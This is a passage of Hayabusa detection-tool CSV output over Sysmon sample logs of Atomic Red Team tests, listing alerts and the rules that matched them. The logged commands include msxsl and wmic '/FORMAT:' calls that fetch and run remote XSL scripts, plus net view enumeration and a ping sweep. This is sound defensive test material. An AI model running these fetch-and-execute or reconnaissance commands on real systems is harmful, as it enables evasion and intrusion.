Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:19.549 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1888 | PGUID: 747F3D96-D8AB-5D31-0000-0010A4D53200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:25.376 +09:00,MSEDGEWIN10,3,medium,,Network 
Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49727 (MSEDGEWIN10.home) | Dst: 172.217.17.132:80 (ams15s30-in-f4.1e100.net) | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500,../hayabusa-rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:25.376 +09:00,MSEDGEWIN10,3,low,Exec,PowerShell Network Connections,,../hayabusa-rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:50.046 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Temp\msxsl.exe C:\AtomicRedTeam\atomics\T1220\src\msxslxmlfile.xml C:\AtomicRedTeam\atomics\T1220\src\msxslscript.xsl"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4004 | PGUID: 747F3D96-D8CA-5D31-0000-0010DA413300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:50.086 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6268 | PGUID: 747F3D96-D8CA-5D31-0000-0010CF443300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:53.011 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Temp\msxsl.exe 
https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 948 | PGUID: 747F3D96-D8CC-5D31-0000-001038513300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:53.062 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1852 | PGUID: 747F3D96-D8CD-5D31-0000-001047543300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:55.991 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:list"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5380 | PGUID: 747F3D96-D8CF-5D31-0000-00109B603300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:56.047 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: wmic.exe process /FORMAT:list | Process: C:\Windows\System32\wbem\WMIC.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:list"" | LID: 0x50951 | PID: 7040 | PGUID: 747F3D96-D8D0-5D31-0000-0010F3623300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:56.047 
+09:00,MSEDGEWIN10,1,medium,Exec,Suspicious WMI Reconnaissance,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmic_reconnaissance.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:56.182 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 396 | PGUID: 747F3D96-D8D0-5D31-0000-001034673300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:06.728 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5340 | PGUID: 747F3D96-D8DA-5D31-0000-0010D3833300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:06.753 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl | Process: C:\Windows\System32\wbem\WMIC.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl"" | LID: 0x50951 | PID: 3220 | PGUID: 747F3D96-D8DA-5D31-0000-001029863300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:06.753 
+09:00,MSEDGEWIN10,1,medium,Evas | Exec,SquiblyTwo,,../hayabusa-rules/sigma/process_creation/proc_creation_win_bypass_squiblytwo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:06.753 +09:00,MSEDGEWIN10,1,medium,Exec,Suspicious WMI Reconnaissance,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmic_reconnaissance.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:06.753 +09:00,MSEDGEWIN10,1,medium,Evas,XSL Script Processing,,../hayabusa-rules/sigma/process_creation/proc_creation_win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:06.888 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4016 | PGUID: 747F3D96-D8DA-5D31-0000-00100D8A3300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:09.823 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""net view /domain"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4856 | PGUID: 747F3D96-D8DD-5D31-0000-0010EF923300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:09.845 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: net view /domain | Process: C:\Windows\System32\net.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""net view /domain"" | LID: 0x50951 | PID: 3012 | PGUID: 
747F3D96-D8DD-5D31-0000-001043953300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:09.845 +09:00,MSEDGEWIN10,1,low,Disc,Windows Network Enumeration,,../hayabusa-rules/sigma/process_creation/proc_creation_win_net_enum.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:09.845 +09:00,MSEDGEWIN10,1,low,Disc | LatMov,Net.exe Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:22.314 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""net view"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1988 | PGUID: 747F3D96-D8EA-5D31-0000-001030B63300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:22.333 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: net view | Process: C:\Windows\System32\net.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""net view"" | LID: 0x50951 | PID: 4684 | PGUID: 747F3D96-D8EA-5D31-0000-00108AB83300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:22.333 +09:00,MSEDGEWIN10,1,low,Disc,Windows Network Enumeration,,../hayabusa-rules/sigma/process_creation/proc_creation_win_net_enum.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:22.333 +09:00,MSEDGEWIN10,1,low,Disc | LatMov,Net.exe 
Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:34.797 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3344 | PGUID: 747F3D96-D8F6-5D31-0000-00100FCB3300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:35.014 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %%i in (1,1,254) do ping -n 1 -w 100 192.168.1.%%i"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4528 | PGUID: 747F3D96-D8F6-5D31-0000-001091D13300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:35.038 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.1 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3876 | PGUID: 747F3D96-D8F7-5D31-0000-0010EDD33300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:35.579 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.2 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2084 | PGUID: 
747F3D96-D8F7-5D31-0000-0010E3D83300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:35.988 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.3 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3068 | PGUID: 747F3D96-D8F7-5D31-0000-0010A7E13300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:36.549 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.4 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4376 | PGUID: 747F3D96-D8F8-5D31-0000-00108FE43300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:37.034 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.5 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3116 | PGUID: 747F3D96-D8F9-5D31-0000-00108BE73300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:37.513 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.6 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in 
(1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3868 | PGUID: 747F3D96-D8F9-5D31-0000-001073EA3300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:38.020 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.7 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1020 | PGUID: 747F3D96-D8FA-5D31-0000-00105BED3300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:38.517 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.8 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2292 | PGUID: 747F3D96-D8FA-5D31-0000-001043F03300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:39.028 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.9 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3612 | PGUID: 747F3D96-D8FB-5D31-0000-00108BF33300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:39.537 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.10 | Process: C:\Windows\System32\PING.EXE | User: 
MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5852 | PGUID: 747F3D96-D8FB-5D31-0000-001073F63300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:40.027 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.11 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2412 | PGUID: 747F3D96-D8FC-5D31-0000-001070F93300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:40.431 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.12 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3736 | PGUID: 747F3D96-D8FC-5D31-0000-00105AFC3300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:41.066 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.13 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1720 | PGUID: 747F3D96-D8FD-5D31-0000-0010650E3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:41.408 +09:00,MSEDGEWIN10,1,info,,Process 
Created,"Cmd: ping -n 1 -w 100 192.168.1.14 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 752 | PGUID: 747F3D96-D8FD-5D31-0000-00104F113400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:41.894 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.15 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4588 | PGUID: 747F3D96-D8FD-5D31-0000-001039143400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:42.466 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.16 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1880 | PGUID: 747F3D96-D8FE-5D31-0000-001023173400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:43.036 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.17 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6172 | PGUID: 
747F3D96-D8FF-5D31-0000-00100E1A3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:43.503 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.18 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4316 | PGUID: 747F3D96-D8FF-5D31-0000-0010C5203400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:44.030 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.19 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6084 | PGUID: 747F3D96-D900-5D31-0000-0010B0233400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:44.507 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.20 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2416 | PGUID: 747F3D96-D900-5D31-0000-00109C263400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:45.011 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.21 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in 
(1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4104 | PGUID: 747F3D96-D901-5D31-0000-001086293400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:45.501 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.22 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5112 | PGUID: 747F3D96-D901-5D31-0000-0010712C3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:46.007 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.23 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1104 | PGUID: 747F3D96-D902-5D31-0000-00105B2F3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:46.500 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.24 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4700 | PGUID: 